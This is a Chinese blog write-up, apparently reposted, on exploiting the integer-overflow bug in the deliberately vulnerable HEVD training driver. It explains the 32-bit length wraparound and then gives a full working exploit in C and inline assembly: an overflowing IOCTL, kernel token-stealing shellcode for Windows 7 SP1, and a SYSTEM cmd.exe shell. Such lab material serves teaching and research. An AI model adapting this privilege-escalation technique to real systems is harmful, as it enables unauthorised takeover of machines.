HEVD 内核漏洞之整数溢出

整数溢出在 CTF 的 pwn 题里面很常见。

这东西确实，怎么说呢，道理就很浅显。

整数的表示范围就那么大，一旦超过就会回绕，从而可能造成漏洞。

先来看一下 HEVD 的源码。

可以看到危险版本和安全版本的区别。

其中这个 TerminatorSize 赋值的地方，

这里 TerminatorSize 就是 4，那么如果我们传入的长度在 0xfffffffc~0xffffffff 之间，加上 TerminatorSize 之后在 32 位下就会回绕成 0~3，

那么就绕过了长度检查。

exp 的话就很简单了。

然后我这里的 ebp 距离和 exp 上面的有所不同，用 IDA 可以看得出来。

 

 

成功执行 shellcode，并且成功拿到权限。

这里是绕过检查的 exp：

#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<vector>
#include<iostream>
#include<time.h>
#include "windows.h"
using namespace std;
/* Type of a bare, argument-less entry point. Declared here but not referenced by the listing. */
typedef void (*FunctionPointer)(void);
/*
 * Ring-0 payload that runs once the overflowed kernel frame returns into it.
 *
 * Token-stealing stub: starting from the current thread's _EPROCESS, walks
 * nt!_EPROCESS.ActiveProcessLinks until UniqueProcessId == 4 (the SYSTEM
 * process on the Win 7 SP1 target named in the asm comments) and copies that
 * process's Token over the current process's Token.  Every field offset below
 * is hard-coded for that single build.
 *
 * Kernel recovery stub: sets eax to STATUS_SUCCESS and unwinds the hijacked
 * frame (add esp / pop ebp / ret 8).  NOTE(review): these fix-up values depend
 * on the driver routine's frame layout; the write-up notes its ebp distance
 * differed from the reference exp and was checked in IDA.
 */
VOID shellcode() {
	
	__asm {
		pushad; Save registers state

			; Start of Token Stealing Stub
			xor eax, eax; Set ZERO
			mov eax, fs:[eax + 124h]; Get nt!_KPCR.PcrbData.CurrentThread
			; _KTHREAD is located at FS : [0x124]

			mov eax, [eax + 050h]; Get nt!_KTHREAD.ApcState.Process

			mov ecx, eax; Copy current process _EPROCESS structure

			mov edx, 4; WIN 7 SP1 SYSTEM process PID = 0x4

		SearchSystemPID:
		mov eax, [eax + 0b8h]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
			sub eax, 0b8h
			cmp[eax + 0b4h], edx; Get nt!_EPROCESS.UniqueProcessId
			jne SearchSystemPID

			mov edx, [eax + 0f8h]; Get SYSTEM process nt!_EPROCESS.Token
			mov[ecx + 0f8h], edx; Replace target process nt!_EPROCESS.Token
			; with SYSTEM process nt!_EPROCESS.Token
			; End of Token Stealing Stub

			popad; Restore registers state

			; Kernel Recovery Stub
			xor eax, eax; Set NTSTATUS SUCCEESS
			add esp, 12; Fix the stack
			pop ebp; Restore saved EBP
			ret 8; Return cleanly
	}
	
}

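/*
 * Spawn an interactive cmd.exe in a new console after the IOCTL has returned.
 *
 * A failed CreateProcessW used to be ignored silently; it is now reported in
 * the same "[-] ... 0x%X" style main() uses so a failed spawn is visible.
 */
static VOID Cmd()
{
	/* W variant matches CreateProcessW directly, so no cast is needed below */
	STARTUPINFOW si = { sizeof(si) };
	PROCESS_INFORMATION pi = { 0 };
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_SHOW;
	/* CreateProcessW may write to its command-line argument, hence a writable array, not a literal */
	WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
	BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
	if (!bReturn) {
		printf("\t\t[-] Failed Spawning cmd.exe: 0x%X\n", GetLastError());
		return;
	}
	/* The child's handles are not used further; close them so this process does not leak them */
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
}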


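/*
 * Open the HEVD device, send the size-overflowing IOCTL and, if the kernel
 * returns cleanly, spawn a shell.
 *
 * Returns 0 on success.  Any Win32 failure or SEH exception is printed and
 * the process leaves via exit(EXIT_FAILURE).  Compared with the original the
 * DeviceIoControl result is checked and the device handle is closed instead
 * of being leaked.
 */
int main()
{
	CHAR buffer[0x830];
	HANDLE hDevice=NULL;
	DWORD bReturn = 0;
	__try
	{

		hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
			GENERIC_READ | GENERIC_WRITE,
			FILE_SHARE_READ | FILE_SHARE_WRITE,
			NULL,
			OPEN_EXISTING,
			/* NOTE(review): the handle is opened overlapped, yet DeviceIoControl below passes a NULL OVERLAPPED — confirm this is intended */
			FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
			NULL
			);
		if (hDevice == INVALID_HANDLE_VALUE || hDevice == NULL) {
			printf("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
			exit(EXIT_FAILURE);
		}
		memset(buffer, 'A', 0x830);
		/* Last two DWORDs of the 0x830-byte buffer: the slot the hijacked frame
		 * returns through (offset is build-specific; the write-up checked it in
		 * IDA) and the value the driver presumably treats as its buffer
		 * terminator — confirm against the HEVD source. */
		*(PDWORD)(buffer + 0x824) = (DWORD)&shellcode;
		*(PDWORD)(buffer + 0x828) = 0xBAD0B0B0;
		/* Input size 0xFFFFFFFF: the vulnerable check adds TerminatorSize (4)
		 * in 32-bit arithmetic, so the sum wraps to 3 and the bounds check
		 * passes even though the real size is far larger than the buffer. */
		if (!DeviceIoControl(hDevice,
			0x222027,
			(LPVOID)buffer,
			(DWORD)0xFFFFFFFF,
			NULL,
			0,
			&bReturn,
			NULL)) {
			printf("\t\t[-] DeviceIoControl Failed: 0x%X\n", GetLastError());
			CloseHandle(hDevice);
			exit(EXIT_FAILURE);
		}
		Cmd();
		CloseHandle(hDevice);	/* previously leaked */

	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("\t\t[-] Exception: 0x%X\n", GetLastError());
		exit(EXIT_FAILURE);
	}

	
	return 0;
}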


转载自blog.csdn.net/qq_41071646/article/details/100900936